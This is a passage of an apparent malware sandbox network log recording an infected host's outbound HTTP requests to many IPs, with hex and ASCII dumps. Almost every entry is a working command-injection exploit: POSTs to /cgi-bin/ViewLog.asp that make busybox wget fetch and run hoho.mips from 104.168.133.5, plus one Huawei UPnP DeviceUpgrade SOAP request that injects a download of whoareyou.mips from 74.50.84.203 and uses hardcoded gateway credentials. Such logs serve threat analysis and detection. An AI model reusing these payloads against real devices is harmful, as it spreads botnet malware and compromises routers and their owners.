                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.323448896 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.595372915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.203196049 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.418778896 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.873992920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              389192.168.2.143920894.122.17.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.625997066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              390192.168.2.144087831.200.53.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.650346041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              391192.168.2.144254694.120.57.138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:14.881634951 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              392192.168.2.1451982156.241.89.17137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.815542936 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              393192.168.2.144932685.69.27.18080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.352998972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.939315081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.091247082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.459160089 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:28.066950083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.282645941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.969818115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              394192.168.2.143381631.136.243.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.356511116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:22.435220957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:28.578996897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.610424995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.209481001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              395192.168.2.145338031.200.50.1438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.379146099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              396192.168.2.144114631.200.104.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.391210079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              397192.168.2.144682694.110.169.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.572273016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              398192.168.2.144619894.187.110.678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.598115921 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
